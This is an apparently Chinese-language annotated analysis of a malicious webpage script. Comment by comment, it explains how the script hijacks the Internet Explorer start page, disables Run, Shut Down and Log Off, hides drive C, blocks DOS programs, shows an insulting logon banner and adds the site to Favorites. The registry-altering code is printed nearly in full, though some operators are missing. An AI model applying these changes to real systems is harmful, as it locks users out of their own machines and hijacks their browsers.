Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.findfeel.com/"); 注:以下是该网页修改受害者的注册表项所用的招数Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"); 注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY");注:使受害者系统没有“关闭系统”项Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"); 注:使受害者系统没有“注销”项Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");注:使受害者系统没有逻辑驱动器CShl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\ Disabled","REG_BINARY");注:禁止运行所有的DOS应用程序;Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\ \WinOldApp\\NoRealMode","REG_BINARY");注:使系统不能启动到“实模式”(传统的DOS模式)下;又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "呜啦啦...");注:这些代码会使窗口的标题是“呜啦啦…”Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定进入悲惨世界"); 注:上面一行是会在窗口中显示出来的文字注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "呜啦啦..."); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "呜啦啦..."); 注:到上面一行为止,完成了对受害者的注册表的所有修改!注:下面代码用来将其网页增加到受害者的收藏夹中var WF, Shor, loc; WF = FSO.GetSpecialFolder(0); loc = WF "\\Favorites"; if(!FSO.FolderExists(loc)) { loc = FSO.GetDriveName(WF) "\\Documents and Settings\\" Net.UserName "\\Favorites"; if(!FSO.FolderExists(loc)) { return; } }注:下面就是使其网页加入到你的收藏夹的具体代码AddFavLnk(loc, "找到感觉www.findfeel.com", http://www.findfeel.com); |